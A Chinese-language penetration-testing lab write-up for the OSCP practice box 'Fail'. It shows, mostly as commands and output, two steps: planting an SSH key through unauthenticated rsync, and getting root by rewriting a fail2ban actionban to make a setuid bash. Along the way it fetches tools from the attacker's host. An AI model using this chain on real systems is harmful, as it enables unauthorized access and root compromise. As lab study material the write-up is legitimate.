OSCP靶场--Fail

OSCP靶场–Fail

考点(rsync未授权覆盖公钥+Fail2ban提权)

1.nmap扫描

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC 192.168.153.126 -p- -Pn --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-12 23:34 EDT
Warning: 192.168.153.126 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.153.126
Host is up (0.14s latency).
Not shown: 64874 closed tcp ports (reset), 659 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
873/tcp open  rsync   (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.83 seconds


2.user priv

2.1 rsync读取文件:

##
## 枚举共享模块:
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV --script "rsync-list-modules" -p 873 192.168.153.126
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-13 02:37 EDT
Nmap scan report for 192.168.153.126
Host is up (0.23s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
| rsync-list-modules: 
|_  fox                 fox home

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds




############
## 枚举共享的fox目录:
┌──(root㉿kali)-[~/Desktop]
└─# rsync -av --list-only rsync://192.168.153.126/fox
receiving incremental file list
drwxr-xr-x          4,096 2021/01/21 09:21:59 .
lrwxrwxrwx              9 2020/12/03 15:22:42 .bash_history -> /dev/null
-rw-r--r--            220 2019/04/18 00:12:36 .bash_logout
-rw-r--r--          3,526 2019/04/18 00:12:36 .bashrc
-rw-r--r--            807 2019/04/18 00:12:36 .profile

####
## 拷贝文件到kali:
┌──(root㉿kali)-[~/Desktop]
└─# rsync -av rsync://192.168.153.126/fox ./fox
receiving incremental file list
created directory ./fox
./
.bash_history -> /dev/null
.bash_logout
.bashrc
.profile

sent 87 bytes  received 4,828 bytes  1,404.29 bytes/sec
total size is 4,562  speedup is 0.93
                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# cd fox           
                                                                                                              
┌──(root㉿kali)-[~/Desktop/fox]
└─# tree ./ -al              
./
├── .bash_history -> /dev/null
├── .bash_logout
├── .bashrc
└── .profile

0 directories, 4 files

###################
## 上面文件没有发现有效信息:
############ 尝试写公钥

2.2 生成秘钥对 rsync上传公钥

##
┌──(root㉿kali)-[~/.ssh]
└─# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:wi6MXgWaQG35nP0zkaRVc8+x7Vx17Z6Z3NGa9NyIgjo root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .. .     .o . .+|
|.  +     o  o o B|
|. . + o + .    =+|
| . o * o o    .++|
|  o   + S..  o.BX|
|   o o ..+. . +=*|
|  . + ..  o.     |
| . . .E          |
|  .    .         |
+----[SHA256]-----+

################
##
┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa.pub >> authorized_keys
                                                                                                              
┌──(root㉿kali)-[~/.ssh]
└─# ls -al
total 32
drwx------  2 root root 4096 Apr 13 03:03 .
drwx------ 27 root root 4096 Apr 13 02:36 ..
-rw-r--r--  1 root root  563 Apr 13 03:03 authorized_keys
-rw-------  1 root root 2590 Apr 13 02:58 id_rsa
-rw-r--r--  1 root root  563 Apr 13 02:58 id_rsa.pub
-rw-------  1 root root 4458 Apr 13 03:02 known_hosts
-rw-------  1 root root 3952 Apr 12 04:17 known_hosts.old

###
## 上传公钥:
┌──(root㉿kali)-[~/.ssh]
└─# rsync -av /root/.ssh/ rsync://192.168.153.126/fox/.ssh
sending incremental file list
./
authorized_keys
known_hosts

sent 1,132 bytes  received 99 bytes  223.82 bytes/sec
total size is 12,126  speedup is 9.85

###############
# 私钥访问:
┌──(root㉿kali)-[~/.ssh]
└─# ssh -i id_rsa fox@192.168.153.126                     
Linux fail 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
fox
$ 


在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

3. root priv[Fail2ban提权]

##
######################
## linpeas枚举:
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                    
  Group fail2ban:                                                                                                                    
/etc/fail2ban/action.d                                                                                                               
/etc/fail2ban/action.d/firewallcmd-ipset.conf
/etc/fail2ban/action.d/nftables-multiport.conf
/etc/fail2ban/action.d/firewallcmd-multiport.conf
/etc/fail2ban/action.d/mail-whois.conf
/etc/fail2ban/action.d/ufw.conf
#)You_can_write_even_more_files_inside_last_directory

##########################
## pspy64监控定时任务:
fox@fail:/tmp$ wget http://192.168.45.195/pspy64
fox@fail:/tmp$ chmod +x ./pspy64
fox@fail:/tmp$ ./pspy64

## 一分钟执行一次的定时任务python3脚本:
2024/04/13 03:35:02 CMD: UID=0     PID=14259  | /usr/bin/python3 /usr/bin/fail2ban-server -xf start 

####
## 查看脚本:对脚本无写权限
fox@fail:/tmp$ ls -l /usr/bin/fail2ban-server
-rwxr-xr-x 1 root root 1419 Sep 23  2018 /usr/bin/fail2ban-server
fox@fail:/tmp$ cat /usr/bin/fail2ban-server
#!/usr/bin/python3
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :

# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

"""
Fail2Ban reads log file that contains password failure report
and bans the corresponding IP addresses using firewall rules.

This tools starts/stops fail2ban server or does client/server communication,
to change/read parameters of the server or jails.

"""

__author__ = "Fail2Ban Developers"
__copyright__ = "Copyright (c) 2004-2008 Cyril Jaquier, 2012-2014 Yaroslav Halchenko, 2014-2016 Serg G. Brester"
__license__ = "GPL"

from fail2ban.client.fail2banserver import exec_command_line, sys

if __name__ == "__main__":
        exec_command_line(sys.argv)



###############
##
fox@fail:/tmp$ id
uid=1000(fox) gid=1001(fox) groups=1001(fox),1000(fail2ban)


####################################
## 修改配置文件:/etc/fail2ban/action.d/iptables-multiport.conf 最后actionban部分:
fox@fail:/tmp$ wget http://192.168.45.195/1.txt -O /etc/fail2ban/action.d/iptables-multiport.conf
--2024-04-13 04:24:13--  http://192.168.45.195/1.txt
Connecting to 192.168.45.195:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 498 [text/plain]
Saving to: ‘/etc/fail2ban/action.d/iptables-multiport.conf’

/etc/fail2ban/actio 100%[===================>]     498  --.-KB/s    in 0s      

utime(/etc/fail2ban/action.d/iptables-multiport.conf): Operation not permitted
2024-04-13 04:24:14 (112 MB/s) - ‘/etc/fail2ban/action.d/iptables-multiport.conf’ saved [498/498]
               cat /etc/fail2ban/action.d/iptables-multiport.conf                              ls -al
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#

[INCLUDES]

before = iptables-common.conf

[Definition]

# Option:  actionstart
# Notes.:  command executed once at the start of Fail2Ban.
# Values:  CMD
#
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> 
actionban = cp /bin/bash /tmp && chmod 4755 /tmp/bash
fox@fail:/tmp$ ls -al
total 3880
drwxrwxrwt  9 root root    4096 Apr 13 03:31 .
drwxr-xr-x 18 root root    4096 Nov 19  2020 ..
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .font-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .ICE-unix
-rwxr-xr-x  1 fox  fox   830030 Jun  8  2023 linpeas.sh
-rwxr-xr-x  1 fox  fox  3104768 Oct 15 16:07 pspy64
drwx------  3 root root    4096 Mar 23 05:54 systemd-private-ed6103b5cc954113b252ce1682f5f3f9-systemd-timesyncd.service-YHAVrn
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .Test-unix
drwx------  2 root root    4096 Mar 23 05:54 vmware-root_307-2117352714
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .XIM-unix
fox@fail:/tmp$ ls -al
total 5024
drwxrwxrwt  9 root root    4096 Apr 13 04:25 .
drwxr-xr-x 18 root root    4096 Nov 19  2020 ..
-rwsr-xr-x  1 root root 1168776 Apr 13 04:26 bash
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .font-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .ICE-unix
-rwxr-xr-x  1 fox  fox   830030 Jun  8  2023 linpeas.sh
-rwxr-xr-x  1 fox  fox  3104768 Oct 15 16:07 pspy64
drwx------  3 root root    4096 Mar 23 05:54 systemd-private-ed6103b5cc954113b252ce1682f5f3f9-systemd-timesyncd.service-YHAVrn
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .Test-unix
drwx------  2 root root    4096 Mar 23 05:54 vmware-root_307-2117352714
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .XIM-unix
fox@fail:/tmp$ ./bash -p
bash-5.0# id
uid=1000(fox) gid=1001(fox) euid=0(root) groups=1001(fox),1000(fail2ban)
bash-5.0# cat /root/proof.txt
67881fb0ba414792fb7abf861095ea55
bash-5.0# 

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
Fail2ban提权:
在这里插入图片描述
hydra制造破解失败触发Fail2Ban禁止ip,触发actionban命令执行:

在这里插入图片描述
获得rootshell:
在这里插入图片描述

4.总结:

## pentesting-rsync
https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync
## writeup:
https://dylanrholloway.com/proving-grounds-fail-write-up/
## fail2ban提权:
https://juggernaut-sec.com/fail2ban-lpe/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/540943.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

体验Humane AI:我与可穿戴AI别针的生活

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗&#xff1f;订阅我们的简报&#xff0c;深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同&#xff0c;从行业内部的深度分析和实用指南中受益。不要错过这个机会&#xff0c;成为AI领…

react使用npm i @reduxjs/toolkit react-redux

npm i reduxjs/toolkit react-redux 创建一个 store文件夹&#xff0c;里面创建index.js文件和子模块文件夹 index,js文件写入以下代码 import {configureStore} from reduxjs/toolkit // 导入子模块 import counterReducer from ./modules/one import two from ./modules/tw…

数字货币:未来金融的崭新篇章

一、数字货币是什么&#xff1f; 数字货币是一种基于区块链技术的货币&#xff0c;它通过去中心化的方式发行和交易&#xff0c;无需传统的金融机构参与。数字货币的交易过程公开透明&#xff0c;可以确保交易的真实性和不可篡改性。比特币、以太坊、瑞波币等是目前比较知名的…

vscode ssh远程服务器并通过代码程序以及terminal启动GUI

写在前面 之前在做带有GUI界面的程序一般都在MobaXterm类似得应用程序中实现&#xff0c;因为自带X Server,但是现在在代码中遇到Bug&#xff0c;需要在vscode中断点调试&#xff0c;但vscode不自带X server,导致没有到问题出就被卡在GUI这一步&#xff0c;这就带来了问题&…

SAP SD学习笔记05 - SD中的一括处理(集中处理),出荷和请求的冻结(替代实现承认功能)

上一章讲了SD的重要概念&#xff0c;比如出荷Plant&#xff08;交货工厂&#xff09;&#xff0c;出荷Point&#xff08;装运点&#xff09;&#xff0c;输送计划&#xff0c;品目的可用性检查&#xff0c;一括纳入/分割纳入&#xff0c;仓库管理等。 SAP SD学习笔记04 - 出荷…

记一次centos合并excel,word,png,pdf为一个整体pdf的入坑爬坑过程(一直显示宋体问题)。

一、背景 原先已经简单实现了excel,word,png,pdf合成一个整体pdf的过程。并将它弄到docker容器中。 1、原先入坑的技术栈 php:7.4 (业务有涉及)php第三方包 setasign\Fpdi\Fpdi : 2.3.6 &#xff08;pdf合并&#xff09;libreoffice : 5.3.6.1ImageMagick: 6.9.10-68 2、…

使用腾讯云服务器如何搭建网站?新手建站教程

使用腾讯云服务器搭建网站全流程&#xff0c;包括轻量应用服务器和云服务器CVM建站教程&#xff0c;轻量可以使用应用镜像一键建站&#xff0c;云服务器CVM可以通过安装宝塔面板的方式来搭建网站&#xff0c;腾讯云服务器网txyfwq.com整理使用腾讯云服务器建站教程&#xff0c;…

蓝桥杯(填空题)

十四届 B组 日期统计&#xff08;暴力枚举&#xff09; 数据 5 6 8 6 9 1 6 1 2 4 9 1 9 8 2 3 6 4 7 7 5 9 5 0 3 8 7 5 8 1 5 8 6 1 8 3 0 3 7 9 2 7 0 5 8 8 5 7 0 9 9 1 9 4 4 6 8 6 3 3 8 5 1 6 3 4 6 7 0 7 8 2 7 6 8 9 5 6 5 6 1 4 0 1 0 0 9 4 8 0 9 1 2 8 5 0 2 5 3…

【日常记录】【JS】js 实现元素平滑上升

文章目录 1、效果图2、基本骨架3、实现4、完整代码 1、效果图 2、基本骨架 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0&…

VLC-Qt实现简单的视频播放器

VLC-Qt是一个结合了Qt应用程序和libVLC的免费开源库。它提供了用于媒体播放的核心类&#xff0c;以及用于快速开发媒体播放器的GUI类。由于集成了整个libVLC&#xff0c;VLC-Qt具备了libVLC的所有特性&#xff0c; 例如&#xff1a;libVLC实例和播放器、单个文件和列表播放、音…

模板方法模式:定义算法骨架的设计策略

在软件开发中&#xff0c;模板方法模式是一种行为型设计模式&#xff0c;它在父类中定义一个操作的算法框架&#xff0c;允许子类在不改变算法结构的情况下重定义算法的某些步骤。这种模式是基于继承的基本原则&#xff0c;通过抽象类达到代码复用的目的。本文将详细介绍模板方…

婆婆被一句“公积金都比你儿子高”整破防了

上一篇&#xff1a;腾讯员工&#xff1a;我年入百万&#xff0c;月供 6 千多&#xff0c;有娃 一个&#xff0c;媳妇大学老师&#xff0c;税后 1.5 万&#xff0c;想辞职躺平&#xff0c;靠媳妇养家&#xff0c;不知道可不可以 一位阿里巴巴集团的员工的家庭成员寻求建议&#…

MybatisPlus——常用注解

MybatisPlus——常用注解 MybatisPlus通过扫描实体类&#xff0c;并基于反射获取实体类信息作为数据库表信息 BaseMapper后的指向的是User实体类 package com.example.mybatisplus02.mapper;import com.baomidou.mybatisplus.core.mapper.BaseMapper; import com.example.my…

RHCE实验2-DNS服务正反向解析

实验开始 一、DNS正向解析 注&#xff1a; server端&#xff1a;192.168.32.147 node端&#xff1a;192.168.32.141 网址&#xff1a;www.openlab.com 1、server端和node端都关闭安全软件&#xff08;以server端为例&#xff09; [rootserver ~]# setenforce 0 [rootser…

新手如何使用腾讯云服务器搭建网站?so easy~

使用腾讯云服务器搭建网站全流程&#xff0c;包括轻量应用服务器和云服务器CVM建站教程&#xff0c;轻量可以使用应用镜像一键建站&#xff0c;云服务器CVM可以通过安装宝塔面板的方式来搭建网站&#xff0c;腾讯云服务器网txyfwq.com整理使用腾讯云服务器建站教程&#xff0c;…

对给定向量旋转

对给定向量旋转 顺时针&#xff1a; 逆时针&#xff1a; 源码&#xff1a; QPointF rotateVector(const QPointF& dir, double angle, bool flag){double rad (angle * M_PI) / 180;QPointF res;if (flag){float x static_cast<float>(dir.x() * std::cos(rad) …

GRE/MGRE详解

GRE GRE&#xff1a;通用路由封装&#xff0c;是标准的三层隧道技术&#xff0c;是一种点对点的隧道技术&#xff1b; 该技术可以实现不同的网络之间安全的访问&#xff1b; 如上&#xff1a;可以使用该技术搭建一条专线&#xff0c;实现公司A与分公司A1之间相互通信&#xf…

7/8电源连接器航空插头端子

概述 7/8电源连接器是一种工业电源连接器的规格型号之一&#xff0c;常见于工业领域的电力传输和连接应用。它的名称中的“7/8”代表连接器插头的直径尺寸&#xff0c;通常为7/8英寸。这种类型的连接器通常用于较大电流传输和较高功率设备的连接&#xff0c;具有较大的电流承载…

在视频号开店,新手一定要注意了,这几个细节很多人都不知道

大家好&#xff0c;我是电商笨笨熊 视频号小店作为今年黑马项目&#xff0c;自是吸引力不少的电商玩家&#xff1b; 但是在这些玩家中不免有一些新手玩家&#xff0c;从未做过电商&#xff0c;或者做过其他平台的电商但是没有接触过视频号&#xff1b; 而视频号小店在某些地…

【央国企专场】——国家电网

国家电网目录 一、电网介绍1、核心业务2、电网组成 二、公司待遇三、公司招聘1、招聘平台2、考试安排2.3 考试内容 一、电网介绍 1、核心业务 国家电网公司&#xff08;State Grid Corporation of China&#xff0c;简称SGCC&#xff09;是中国最大的国有企业之一&#xff0c…